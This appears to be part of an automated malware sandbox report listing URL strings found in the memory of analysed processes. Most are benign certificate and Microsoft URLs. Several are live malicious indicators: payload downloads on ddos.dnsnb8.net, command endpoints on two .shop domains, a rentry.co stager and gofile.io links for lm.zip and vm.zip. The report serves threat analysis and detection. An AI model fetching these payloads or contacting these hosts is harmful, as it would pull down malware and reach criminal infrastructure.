Source: BitLockerToGo.exe, 0000001F.00000003.2406241801.0000000005476000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000026.00000003.2689264498.0000000003165000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: explorer.exe, 0000000E.00000000.1447298084.000000000955E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1447298084.00000000094DC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: BitLockerToGo.exe, 0000001F.00000003.2406241801.0000000005476000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000026.00000003.2689264498.0000000003165000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: explorer.exe, 0000000E.00000000.1447298084.0000000009519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1447298084.000000000955E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1447298084.00000000094DC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: 753F.exe.14.dr	String found in binary or memory: http://crls.ssl.com/SSL.com-timeStamping-I-RSA-R1.crl0
Source: 753F.exe.14.dr	String found in binary or memory: http://crls.ssl.com/SSLcom-RootCA-EV-RSA-4096-R2.crl0
Source: 753F.exe.14.dr	String found in binary or memory: http://crls.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.crl0
Source: 753F.exe.14.dr	String found in binary or memory: http://crls.ssl.com/ssl.com-rsa-RootCA.crl0
Source: BitLockerToGo.exe, 0000001F.00000003.2406241801.0000000005476000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000026.00000003.2689264498.0000000003165000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: vm.exe, 00000025.00000002.3739679273.0000000000575000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: vm.exe, 00000025.00000002.3755459555.0000000005590000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: vm.exe, 00000025.00000003.3158868527.00000000055EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?987c63ebbb8ce
Source: IXDaI.exe, 00000005.00000003.1330174994.00000000011C4000.00000004.00000020.00020000.00000000.sdmp, IXDaI.exe, 00000005.00000003.1337998846.000000000118B000.00000004.00000020.00020000.00000000.sdmp, IXDaI.exe, 00000005.00000002.1466246003.0000000001168000.00000004.00000020.00020000.00000000.sdmp, IXDaI.exe, 00000011.00000002.1680424006.00000000012F0000.00000004.00000020.00020000.00000000.sdmp, IXDaI.exe, 00000011.00000002.1680424006.0000000001362000.00000004.00000020.00020000.00000000.sdmp, IXDaI.exe, 00000011.00000002.1680424006.00000000012F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar
Source: IXDaI.exe, 00000005.00000003.1330174994.00000000011C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarP
Source: IXDaI.exe, 00000011.00000002.1680424006.0000000001362000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarY
Source: IXDaI.exe, 00000011.00000002.1680424006.0000000001362000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rar
Source: IXDaI.exe, 00000011.00000002.1680424006.0000000001362000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k3.rar
Source: IXDaI.exe, 00000011.00000002.1680424006.0000000001362000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k3.rar6
Source: IXDaI.exe, 00000011.00000002.1680424006.0000000001362000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k3.rarB
Source: IXDaI.exe, 00000011.00000002.1680424006.0000000001362000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k4.rar
Source: IXDaI.exe, 00000011.00000002.1680424006.0000000001362000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k4.rar#
Source: IXDaI.exe, 00000011.00000002.1680424006.0000000001362000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k4.rarO
Source: IXDaI.exe, 00000011.00000002.1680424006.000000000137E000.00000004.00000020.00020000.00000000.sdmp, IXDaI.exe, 00000011.00000002.1680424006.0000000001362000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k5.rar
Source: IXDaI.exe, 00000011.00000002.1680424006.0000000001362000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k5.rar5
Source: IXDaI.exe, 00000011.00000002.1680424006.000000000137E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k5.rarC:
Source: B552.exe, 0000001B.00000000.2227779245.00007FF75F304000.00000008.00000001.01000000.0000000B.sdmp, B552.exe, 0000001B.00000002.2363529476.00007FF75F313000.00000008.00000001.01000000.0000000B.sdmp, B552.exe.14.dr	String found in binary or memory: http://html4/loose.dtd
Source: powershell.exe, 00000020.00000002.2668792904.0000020A779CA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: explorer.exe, 0000000E.00000000.1447298084.000000000955E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1447298084.00000000094DC000.00000004.00000001.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001F.00000003.2406241801.0000000005476000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000026.00000003.2689264498.0000000003165000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 0000000E.00000000.1444506660.000000000305D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: BitLockerToGo.exe, 0000001F.00000003.2406241801.0000000005476000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000026.00000003.2689264498.0000000003165000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: 753F.exe.14.dr	String found in binary or memory: http://ocsps.ssl.com0
Source: 753F.exe.14.dr	String found in binary or memory: http://ocsps.ssl.com0?
Source: 753F.exe.14.dr	String found in binary or memory: http://ocsps.ssl.com0_
Source: powershell.exe, 00000020.00000002.2624078104.0000020A67B87000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: 753F.exe, 0000001C.00000002.2708165528.000001C080410000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://rentry.co
Source: explorer.exe, 0000000E.00000000.1444301138.0000000002C00000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000000.1446452497.0000000007AF0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000000.1446467091.0000000007B10000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: powershell.exe, 00000020.00000002.2624078104.0000020A67D90000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: 753F.exe, 0000001C.00000002.2708165528.000001C080001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2624078104.0000020A67961000.00000004.00000800.00020000.00000000.sdmp, vm.exe, 00000025.00000002.3743090864.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, vm.exe, 00000025.00000002.3743090864.0000000002D49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000020.00000002.2624078104.0000020A67D90000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000020.00000002.2624078104.0000020A690FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://store4.gofile.io
Source: SciTE.exe.5.dr	String found in binary or memory: http://www.activestate.com
Source: SciTE.exe.5.dr	String found in binary or memory: http://www.activestate.comHolger
Source: powershell.exe, 00000020.00000002.2624078104.0000020A67B87000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: explorer.exe, 0000000E.00000000.1447862980.00000000095B9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: SciTE.exe.5.dr	String found in binary or memory: http://www.baanboard.com
Source: SciTE.exe.5.dr	String found in binary or memory: http://www.baanboard.comBrendon
Source: SciTE.exe.5.dr	String found in binary or memory: http://www.develop.com
Source: SciTE.exe.5.dr	String found in binary or memory: http://www.develop.comDeepak
Source: SciTE.exe.5.dr	String found in binary or memory: http://www.lua.org
Source: F6D9.exe	String found in binary or memory: http://www.oberhumer.com
Source: SciTE.exe.5.dr	String found in binary or memory: http://www.rftp.com
Source: SciTE.exe.5.dr	String found in binary or memory: http://www.rftp.comJosiah
Source: SciTE.exe.5.dr	String found in binary or memory: http://www.scintilla.org
Source: SciTE.exe.5.dr	String found in binary or memory: http://www.scintilla.org/scite.rng
Source: SciTE.exe.5.dr	String found in binary or memory: http://www.spaceblue.com
Source: SciTE.exe.5.dr	String found in binary or memory: http://www.spaceblue.comMathias
Source: 753F.exe.14.dr	String found in binary or memory: http://www.ssl.com/repository/SSLcom-RootCA-EV-RSA-4096-R2.crt0
Source: 753F.exe.14.dr	String found in binary or memory: http://www.ssl.com/repository/SSLcomRootCertificationAuthorityRSA.crt0
Source: BitLockerToGo.exe, 0000001F.00000003.2406241801.0000000005476000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000026.00000003.2689264498.0000000003165000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: BitLockerToGo.exe, 0000001F.00000003.2406241801.0000000005476000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000026.00000003.2689264498.0000000003165000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: BitLockerToGo.exe, 0000001F.00000003.2369274827.0000000005476000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001F.00000003.2368524961.0000000005479000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001F.00000003.2370710751.0000000005476000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000026.00000003.2643416050.000000000316E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: explorer.exe, 0000000E.00000000.1449509463.000000000D1B6000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppin
Source: powershell.exe, 00000020.00000002.2624078104.0000020A67961000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000020.00000002.2624078104.0000020A67D90000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2624078104.0000020A68B86000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: powershell.exe, 00000020.00000002.2624078104.0000020A68DB7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
Source: explorer.exe, 0000000E.00000000.1449509463.000000000D1B6000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 0000000E.00000000.1447298084.00000000093B4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/$
Source: explorer.exe, 0000000E.00000000.1447298084.00000000093B4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/X
Source: explorer.exe, 0000000E.00000000.1443804807.00000000008DE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1444506660.0000000002FA0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 0000000E.00000000.1447298084.00000000093B4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
Source: explorer.exe, 0000000E.00000000.1445489824.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=C2BB6DDCE8D847D6B779FE8AEC27D161&timeOut=5000&oc
Source: explorer.exe, 0000000E.00000000.1444506660.0000000002FA0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1445489824.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 0000000E.00000000.1447298084.0000000009390000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.comWzE
Source: explorer.exe, 0000000E.00000000.1445489824.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
Source: explorer.exe, 0000000E.00000000.1445489824.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg
Source: explorer.exe, 0000000E.00000000.1445489824.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svg
Source: explorer.exe, 0000000E.00000000.1445489824.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsi
Source: BitLockerToGo.exe, 0000001F.00000003.2408861121.0000000005441000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000026.00000003.2710189734.0000000003138000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&ci=1696497267574.12791&key=1696497267400700
Source: lm.exe, 00000026.00000003.2710189734.0000000003138000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&ci=1696497267574.12791&key=1696497267400700002.1&cta
Source: BitLockerToGo.exe, 0000001F.00000003.2366071084.0000000002F86000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001F.00000003.2489374820.0000000002FD9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://callosallsaospz.shop/
Source: BitLockerToGo.exe, 0000001F.00000003.2488802452.0000000002FD5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001F.00000003.2489374820.0000000002FD9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://callosallsaospz.shop/)
Source: BitLockerToGo.exe, 0000001F.00000002.2490089240.0000000002FDA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001F.00000003.2488802452.0000000002FD5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001F.00000003.2489374820.0000000002FD9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://callosallsaospz.shop/1
Source: BitLockerToGo.exe, 0000001F.00000003.2451884528.0000000002FDC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001F.00000002.2490089240.0000000002FDA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001F.00000003.2488802452.0000000002FD5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001F.00000003.2451637536.0000000002FD5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001F.00000003.2457471524.0000000002FD5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001F.00000003.2489374820.0000000002FD9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://callosallsaospz.shop/BC
Source: BitLockerToGo.exe, 0000001F.00000003.2451637536.0000000002FEF000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001F.00000003.2489374820.0000000002FEF000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001F.00000003.2366071084.0000000002F78000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001F.00000002.2490089240.0000000002FDA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001F.00000003.2488802452.0000000002FD5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001F.00000003.2489374820.0000000002FD9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://callosallsaospz.shop/api
Source: BitLockerToGo.exe, 0000001F.00000002.2490089240.0000000002FEF000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001F.00000003.2489374820.0000000002FEF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://callosallsaospz.shop/api1
Source: BitLockerToGo.exe, 0000001F.00000003.2488802452.0000000002FD5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001F.00000003.2489374820.0000000002FD9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://callosallsaospz.shop/b
Source: BitLockerToGo.exe, 0000001F.00000003.2369274827.0000000005476000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001F.00000003.2368524961.0000000005479000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001F.00000003.2370710751.0000000005476000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000026.00000003.2643416050.000000000316E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: explorer.exe, 0000000E.00000000.1445489824.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT
Source: explorer.exe, 0000000E.00000000.1445489824.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark
Source: BitLockerToGo.exe, 0000001F.00000003.2369274827.0000000005476000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001F.00000003.2368524961.0000000005479000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001F.00000003.2370710751.0000000005476000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000026.00000003.2643416050.000000000316E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: BitLockerToGo.exe, 0000001F.00000003.2369274827.0000000005476000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001F.00000003.2368524961.0000000005479000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001F.00000003.2370710751.0000000005476000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000026.00000003.2643416050.000000000316E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: BitLockerToGo.exe, 0000001F.00000003.2408861121.0000000005441000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000026.00000003.2710189734.0000000003138000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/5b4DH7KHAf2n_mNaLjNi1-UAoKmM9rhqaA9w7FyznHo.10943.jpg
Source: lm.exe, 00000026.00000003.2710189734.0000000003138000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: powershell.exe, 00000020.00000002.2668792904.0000020A779CA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000020.00000002.2668792904.0000020A779CA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000020.00000002.2668792904.0000020A779CA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: BitLockerToGo.exe, 0000001F.00000003.2369274827.0000000005476000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001F.00000003.2368524961.0000000005479000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001F.00000003.2370710751.0000000005476000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000026.00000003.2643416050.000000000316E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: BitLockerToGo.exe, 0000001F.00000003.2369274827.0000000005476000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001F.00000003.2368524961.0000000005479000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001F.00000003.2370710751.0000000005476000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000026.00000003.2643416050.000000000316E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: BitLockerToGo.exe, 0000001F.00000003.2369274827.0000000005476000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001F.00000003.2368524961.0000000005479000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001F.00000003.2370710751.0000000005476000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000026.00000003.2643416050.000000000316E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: explorer.exe, 0000000E.00000000.1449509463.000000000D1B6000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.comE
Source: powershell.exe, 00000020.00000002.2624078104.0000020A67B87000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: explorer.exe, 0000000E.00000000.1445489824.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15G9PH.img
Source: explorer.exe, 0000000E.00000000.1445489824.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hJkDs.img
Source: explorer.exe, 0000000E.00000000.1445489824.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBNvr53.img
Source: lm.exe, 00000026.00000003.2710189734.0000000003138000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqrfQHr4pbW4ZbWfpbY7ReNxR3UIG8zInwYIFIVs9eYi
Source: lm.exe, 00000026.00000003.2640613432.000000000067D000.00000004.00000020.00020000.00000000.sdmp, lm.exe, 00000026.00000003.2682127976.0000000003115000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000026.00000003.2805912888.0000000003127000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000026.00000003.2776009406.0000000003144000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000026.00000002.2895669741.0000000003127000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000026.00000003.2710158807.000000000313E000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000026.00000003.2741303934.0000000003128000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000026.00000002.2885932416.000000000065F000.00000004.00000020.00020000.00000000.sdmp, lm.exe, 00000026.00000003.2671333888.0000000003115000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000026.00000003.2715297598.0000000003144000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000026.00000002.2885932416.000000000067D000.00000004.00000020.00020000.00000000.sdmp, lm.exe, 00000026.00000003.2713680511.0000000003140000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000026.00000003.2729559730.0000000003121000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://liernessfornicsa.shop/
Source: lm.exe, 00000026.00000002.2895669741.0000000003127000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://liernessfornicsa.shop/8
Source: lm.exe, 00000026.00000003.2640613432.000000000067D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://liernessfornicsa.shop/_
Source: lm.exe, 00000026.00000003.2682127976.000000000313A000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000026.00000003.2731047551.0000000000670000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://liernessfornicsa.shop/api
Source: lm.exe, 00000026.00000003.2846410742.000000000313E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://liernessfornicsa.shop/api(
Source: lm.exe, 00000026.00000003.2682127976.0000000003115000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000026.00000003.2671333888.0000000003115000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://liernessfornicsa.shop/api4
Source: lm.exe, 00000026.00000003.2805912888.0000000003127000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000026.00000002.2895669741.0000000003127000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://liernessfornicsa.shop/apiXvg
Source: lm.exe, 00000026.00000002.2895669741.0000000003127000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://liernessfornicsa.shop/fD
Source: lm.exe, 00000026.00000003.2805912888.0000000003127000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://liernessfornicsa.shop/g
Source: lm.exe, 00000026.00000002.2895669741.0000000003127000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://liernessfornicsa.shop:443/api
Source: IXDaI.exe, 00000005.00000002.1466246003.00000000011BE000.00000004.00000020.00020000.00000000.sdmp, IXDaI.exe, 00000005.00000003.1330174994.00000000011C4000.00000004.00000020.00020000.00000000.sdmp, IXDaI.exe, 00000011.00000002.1680424006.0000000001362000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com
Source: powershell.exe, 00000020.00000002.2668792904.0000020A779CA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: explorer.exe, 0000000E.00000000.1449509463.000000000D1B6000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.comNaP0B
Source: explorer.exe, 0000000E.00000000.1449509463.000000000CFF4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.comcemberZ
Source: 753F.exe, 0000001C.00000002.2708165528.000001C080396000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://rentry.co
Source: 753F.exe, 0000001C.00000002.2708165528.000001C080396000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://rentry.co/mi
Source: 753F.exe, 0000001C.00000002.2708165528.000001C080318000.00000004.00000800.00020000.00000000.sdmp, 753F.exe, 0000001C.00000002.2708165528.000001C080267000.00000004.00000800.00020000.00000000.sdmp, 753F.exe, 0000001C.00000002.2708165528.000001C080396000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://rentry.co/microgods/raw
Source: powershell.exe, 00000020.00000002.2624078104.0000020A67B87000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2624078104.0000020A690D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://store4.gofile.io
Source: powershell.exe, 00000020.00000002.2624078104.0000020A67B87000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2624078104.0000020A690D1000.00000004.00000800.00020000.00000000.sdmp, rentry-script.ps1.28.dr	String found in binary or memory: https://store4.gofile.io/download/direct/0656c5cf-51b4-4fa4-ae48-8ee5ed3d142e/lm.zip
Source: powershell.exe, 00000020.00000002.2624078104.0000020A67B87000.00000004.00000800.00020000.00000000.sdmp, rentry-script.ps1.28.dr	String found in binary or memory: https://store4.gofile.io/download/direct/6b24ec97-2a8d-468d-a24d-c8081cda1dab/vm.zip
Source: lm.exe, 00000026.00000003.2693429073.000000000357C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: lm.exe, 00000026.00000003.2693429073.000000000357C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
